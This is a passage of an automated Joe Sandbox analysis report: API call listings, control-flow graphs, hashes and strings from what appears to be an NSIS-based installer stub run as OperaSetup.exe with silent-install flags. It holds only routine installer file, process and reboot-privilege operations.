                                                                                                                                                                            • GetTempPathW.KERNEL32(00002000,004D1000,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(004D1000,00001FFB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                                                                                                                                            • lstrcatW.KERNEL32(004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403965
                                                                                                                                                                            • GetTempPathW.KERNEL32(00001FFC,004D1000,004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403979
                                                                                                                                                                            • lstrcatW.KERNEL32(004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403981
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,004D1000,004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,004D1000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
                                                                                                                                                                            • DeleteFileW.KERNEL32(004CD000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004039AE
                                                                                                                                                                            • lstrlenW.KERNEL32(004D1000,004BD000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A87
                                                                                                                                                                              • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                                                            • wsprintfW.USER32 ref: 00403AE4
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00481000,004D1000), ref: 00403B17
                                                                                                                                                                            • DeleteFileW.KERNEL32(00481000), ref: 00403B23
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(004D1000,004D1000), ref: 00403B51
                                                                                                                                                                              • Part of subcall function 00406462: MoveFileExW.KERNEL32(?,?,00000005,00405F60,?,00000000,000000F1,?,?,?,?,?), ref: 0040646C
                                                                                                                                                                            • CopyFileW.KERNEL32(004D9000,00481000,00000001,004D1000,00000000), ref: 00403B67
                                                                                                                                                                              • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                                              • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                                                              • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(74DF3420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0), ref: 00406A0A
                                                                                                                                                                              • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
                                                                                                                                                                            • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB0
                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB5
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403BD2
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00485000,00485000,?,00481000,00000000), ref: 00403BD9
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BF5
                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BFC
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403C7C
                                                                                                                                                                              • Part of subcall function 00405C50: CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                                                            • API String ID: 2017177436-2502969717
                                                                                                                                                                            • Opcode ID: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
                                                                                                                                                                            • Instruction ID: d5dd5e0f9c74a08960ebc8aa75e9a138e3a42fd8f19371cc0c5244fd25c86c9d
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
                                                                                                                                                                            • Instruction Fuzzy Hash: 56F108316043019AD720AF769D45B2B7AE8EF4174AF10883EF581B22D1DB7CDA45CB6E

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 296 405dae-405dd4 call 406079 299 405dd6-405de8 DeleteFileW 296->299 300 405ded-405df4 296->300 301 405f6a-405f6e 299->301 302 405df6-405df8 300->302 303 405e07-405e17 call 4066a2 300->303 304 405f18-405f1d 302->304 305 405dfe-405e01 302->305 309 405e26-405e27 call 405fbd 303->309 310 405e19-405e24 lstrcatW 303->310 304->301 308 405f1f-405f22 304->308 305->303 305->304 311 405f24-405f2a 308->311 312 405f2c-405f34 call 4069ff 308->312 313 405e2c-405e30 309->313 310->313 311->301 312->301 320 405f36-405f4a call 405f71 call 405d66 312->320 316 405e32-405e3a 313->316 317 405e3c-405e42 lstrcatW 313->317 316->317 319 405e47-405e63 lstrlenW FindFirstFileW 316->319 317->319 321 405e69-405e71 319->321 322 405f0d-405f11 319->322 336 405f62-405f65 call 405727 320->336 337 405f4c-405f4f 320->337 325 405e91-405ea5 call 4066a2 321->325 326 405e73-405e7b 321->326 322->304 324 405f13 322->324 324->304 338 405ea7-405eaf 325->338 339 405ebc-405ec7 call 405d66 325->339 328 405ef0-405f00 FindNextFileW 326->328 329 405e7d-405e85 326->329 328->321 332 405f06-405f07 FindClose 328->332 329->325 333 405e87-405e8f 329->333 332->322 333->325 333->328 336->301 337->311 343 405f51-405f60 call 405727 call 406462 337->343 338->328 340 405eb1-405eba call 405dae 338->340 349 405ee8-405eeb call 405727 339->349 350 405ec9-405ecc 339->350 340->328 343->301 349->328 352 405ee0-405ee6 350->352 353 405ece-405ede call 405727 call 406462 350->353 352->328 353->328
                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,004BD000), ref: 00405DD7
                                                                                                                                                                            • lstrcatW.KERNEL32(00452750,\*.*,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E1F
                                                                                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E42
                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E48
                                                                                                                                                                            • FindFirstFileW.KERNEL32(00452750,?,?,?,0040A014,?,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E58
                                                                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EF8
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405F07
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                            • String ID: P'E$\*.*
                                                                                                                                                                            • API String ID: 2035342205-897026672
                                                                                                                                                                            • Opcode ID: 2a22b74e29257ee4312f2694a2476e0e063d7e13d36b91b3edff1e0c18e84ae8
                                                                                                                                                                            • Instruction ID: d3f7042800757c758c726763e218659af4e34a2018f279a2393577cf1f32b1c8
                                                                                                                                                                            • Opcode Fuzzy Hash: 2a22b74e29257ee4312f2694a2476e0e063d7e13d36b91b3edff1e0c18e84ae8
                                                                                                                                                                            • Instruction Fuzzy Hash: 5741D130800A05E6CB21AB61CD89ABF7678EF45755F14413FF881B11D1DB7C8A82DEAE

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 470 406dc0-406dc5 471 406e36-406e54 470->471 472 406dc7-406df6 470->472 475 40742c-407441 471->475 473 406df8-406dfb 472->473 474 406dfd-406e01 472->474 476 406e0d-406e10 473->476 477 406e03-406e07 474->477 478 406e09 474->478 479 407443-407459 475->479 480 40745b-407471 475->480 481 406e12-406e1b 476->481 482 406e2e-406e31 476->482 477->476 478->476 483 407474-40747b 479->483 480->483 486 406e20-406e2c 481->486 487 406e1d 481->487 488 407003-407021 482->488 484 4074a2-4074ae 483->484 485 40747d-407481 483->485 497 406c44-406c4d 484->497 489 407630-40763a 485->489 490 407487-40749f 485->490 494 406e96-406ec4 486->494 487->486 492 407023-407037 488->492 493 407039-40704b 488->493 499 407646-407659 489->499 490->484 498 40704e-407058 492->498 493->498 495 406ee0-406efa 494->495 496 406ec6-406ede 494->496 500 406efd-406f07 495->500 496->500 501 406c53 497->501 502 40765b 497->502 503 40705a 498->503 504 406ffb-407001 498->504 505 40765e-407662 499->505 507 406f0d 500->507 508 406e7e-406e84 500->508 509 406c5a-406c5e 501->509 510 406d9a-406dbb 501->510 511 406cff-406d03 501->511 512 406d6f-406d73 501->512 502->505 513 406fd6-406fda 503->513 514 40716b-407178 503->514 504->488 506 406f9f-406fa9 504->506 522 4075ee-4075f8 506->522 523 406faf-406fd1 506->523 529 406e63-406e7b 507->529 530 4075ca-4075d4 507->530 524 406f37-406f3d 508->524 525 406e8a-406e90 508->525 509->499 518 406c64-406c71 509->518 510->475 526 406d09-406d22 511->526 527 4075af-4075b9 511->527 520 406d79-406d8d 512->520 521 4075be-4075c8 512->521 515 406fe0-406ff8 513->515 516 4075e2-4075ec 513->516 514->497 519 4071c7-4071d6 514->519 515->504 516->499 518->502 528 406c77-406cbd 518->528 519->475 534 406d90-406d98 520->534 521->499 522->499 523->514 531 406f9b 524->531 533 406f3f-406f5d 524->533 525->494 525->531 532 406d25-406d29 526->532 527->499 536 406ce5-406ce7 528->536 537 406cbf-406cc3 528->537 529->508 530->499 531->506 532->511 535 406d2b-406d31 532->535 538 406f75-406f87 533->538 539 406f5f-406f73 533->539 534->510 534->512 544 406d33-406d3a 535->544 545 406d5b-406d6d 535->545 542 406cf5-406cfd 536->542 543 406ce9-406cf3 536->543 540 406cc5-406cc8 GlobalFree 537->540 541 406cce-406cdc GlobalAlloc 537->541 546 406f8a-406f94 538->546 539->546 540->541 541->502 549 406ce2 541->549 542->532 543->542 543->543 547 406d45-406d55 GlobalAlloc 544->547 548 406d3c-406d3f GlobalFree 544->548 545->534 546->524 550 406f96 546->550 547->502 547->545 548->547 549->536 552 4075d6-4075e0 550->552 553 406f1c-406f34 550->553 552->499 553->524
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                                                                                                                                            • Instruction ID: 2c84522690a72e7b125efbdd79dcce5a6d58b8fc95eff680b6a5e34cc787ad25
                                                                                                                                                                            • Opcode Fuzzy Hash: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                                                                                                                                            • Instruction Fuzzy Hash: 5EF17670D04229CBDF28CFA8C8946ADBBB1FF44305F24856ED456BB281D7786A86CF45
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(74DF3420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0), ref: 00406A0A
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406A16
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                            • Opcode ID: c678162996fe6daf9e8ab4f1fec6b2103351496eed0ed7f1d1f24d988285780e
                                                                                                                                                                            • Instruction ID: 35f0ff7019ed0dad564a4e6eb4f1dd92456e0906ec704515d4596d21edce6ab9
                                                                                                                                                                            • Opcode Fuzzy Hash: c678162996fe6daf9e8ab4f1fec6b2103351496eed0ed7f1d1f24d988285780e
                                                                                                                                                                            • Instruction Fuzzy Hash: EDD012317551205BC241A73C6D0C89B7E589F1A3317118B37F46BF21E4D7348C628A9D

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 149 403d74-403d8c call 406a96 152 403da0-403dd7 call 406570 149->152 153 403d8e-403d9e call 4065e9 149->153 158 403dd9-403dea call 406570 152->158 159 403def-403df5 lstrcatW 152->159 162 403dfa-403e23 call 40404a call 406079 153->162 158->159 159->162 167 403eb5-403ebd call 406079 162->167 168 403e29-403e2e 162->168 174 403ecb-403ef0 LoadImageW 167->174 175 403ebf-403ec6 call 4066df 167->175 168->167 169 403e34-403e5c call 406570 168->169 169->167 176 403e5e-403e62 169->176 178 403f71-403f79 call 40140b 174->178 179 403ef2-403f22 RegisterClassW 174->179 175->174 180 403e74-403e80 lstrlenW 176->180 181 403e64-403e71 call 405f9e 176->181 190 403f83-403f8e call 40404a 178->190 191 403f7b-403f7e 178->191 182 404040 179->182 183 403f28-403f6c SystemParametersInfoW CreateWindowExW 179->183 187 403e82-403e90 lstrcmpiW 180->187 188 403ea8-403eb0 call 405f71 call 4066a2 180->188 181->180 186 404042-404049 182->186 183->178 187->188 194 403e92-403e9c GetFileAttributesW 187->194 188->167 202 403f94-403fae ShowWindow call 406a26 190->202 203 404017-40401f call 4057fa 190->203 191->186 197 403ea2-403ea3 call 405fbd 194->197 198 403e9e-403ea0 194->198 197->188 198->188 198->197 210 403fb0-403fb5 call 406a26 202->210 211 403fba-403fcc GetClassInfoW 202->211 208 404021-404027 203->208 209 404039-40403b call 40140b 203->209 208->191 212 40402d-404034 call 40140b 208->212 209->182 210->211 215 403fe4-404015 DialogBoxParamW call 40140b call 403cc4 211->215 216 403fce-403fde GetClassInfoW RegisterClassW 211->216 212->191 215->186 216->215
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00406A96: GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                                                                                                                                              • Part of subcall function 00406A96: GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                                                                                                                                            • lstrcatW.KERNEL32(004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,74DF3420,004D1000,00000000,004BD000,00008001), ref: 00403DF5
                                                                                                                                                                            • lstrlenW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,74DF3420), ref: 00403E75
                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000), ref: 00403E88
                                                                                                                                                                            • GetFileAttributesW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0), ref: 00403E93
                                                                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C1000), ref: 00403EDC
                                                                                                                                                                              • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                                                                                                                                            • RegisterClassW.USER32(00464200), ref: 00403F19
                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F31
                                                                                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F66
                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403F9C
                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00464200), ref: 00403FC8
                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00464200), ref: 00403FD5
                                                                                                                                                                            • RegisterClassW.USER32(00464200), ref: 00403FDE
                                                                                                                                                                            • DialogBoxParamW.USER32(?,00000000,00404122,00000000), ref: 00403FFD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                            • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$H'D$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                            • API String ID: 1975747703-2310240611
                                                                                                                                                                            • Opcode ID: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
                                                                                                                                                                            • Instruction ID: 15514f3cea8a7976e0aa4835bc9f56462f0e59a4e5397df6ef3051f83c2bc2bc
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C61E770640301BED720AF669D95F273AACEB85B49F10457FF941B22E2DB7D58018A2E

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 223 4030f5-403143 GetTickCount GetModuleFileNameW call 406192 226 403145-40314a 223->226 227 40314f-40317d call 4066a2 call 405fbd call 4066a2 GetFileSize 223->227 228 40338f-403393 226->228 235 403183 227->235 236 403268-403276 call 403053 227->236 238 403188-40319f 235->238 242 403347-40334c 236->242 243 40327c-40327f 236->243 240 4031a1 238->240 241 4031a3-4031ac call 403607 238->241 240->241 248 4031b2-4031b9 241->248 249 403303-40330b call 403053 241->249 242->228 246 403281-403299 call 40361d call 403607 243->246 247 4032ab-4032f7 GlobalAlloc call 406bf1 call 4061c1 CreateFileW 243->247 246->242 270 40329f-4032a5 246->270 274 4032f9-4032fe 247->274 275 40330d-40333d call 40361d call 403396 247->275 252 403235-403239 248->252 253 4031bb-4031cf call 40614d 248->253 249->242 260 403243-403249 252->260 261 40323b-403242 call 403053 252->261 253->260 272 4031d1-4031d8 253->272 265 403258-403260 260->265 266 40324b-403255 call 406b83 260->266 261->260 265->238 273 403266 265->273 266->265 270->242 270->247 272->260 277 4031da-4031e1 272->277 273->236 274->228 284 403342-403345 275->284 277->260 279 4031e3-4031ea 277->279 279->260 281 4031ec-4031f3 279->281 281->260 283 4031f5-403215 281->283 283->242 286 40321b-40321f 283->286 284->242 285 40334e-40335f 284->285 287 403361 285->287 288 403367-40336c 285->288 289 403221-403225 286->289 290 403227-40322f 286->290 287->288 291 40336d-403373 288->291 289->273 289->290 290->260 292 403231-403233 290->292 291->291 293 403375-40338d call 40614d 291->293 292->260 293->228
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403109
                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,004D9000,00002000), ref: 00403125
                                                                                                                                                                              • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                                                              • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004DD000,00000000,004C9000,004C9000,004D9000,004D9000,80000000,00000003), ref: 0040316E
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00008001), ref: 004032B0
                                                                                                                                                                            Strings
                                                                                                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032F9
                                                                                                                                                                            • hA, xrefs: 004032B6
                                                                                                                                                                            • Error launching installer, xrefs: 00403145
                                                                                                                                                                            • soft, xrefs: 004031E3
                                                                                                                                                                            • Inst, xrefs: 004031DA
                                                                                                                                                                            • Null, xrefs: 004031EC
                                                                                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403347
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$hA$soft
                                                                                                                                                                            • API String ID: 2803837635-3376623841
                                                                                                                                                                            • Opcode ID: a78e4ad808f85481dcd79512046ee08fb7c97768d62f5dc4e9826f195081d52b
                                                                                                                                                                            • Instruction ID: ad1f7a9ef70f4aee06910e8501363caf5be3f78a24e024e3506d72c770e38dd5
                                                                                                                                                                            • Opcode Fuzzy Hash: a78e4ad808f85481dcd79512046ee08fb7c97768d62f5dc4e9826f195081d52b
                                                                                                                                                                            • Instruction Fuzzy Hash: 0271A071D00204ABDB209FA4DD85B6E7AACEB05716F10417FE911B72D1DB789F408B6D

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
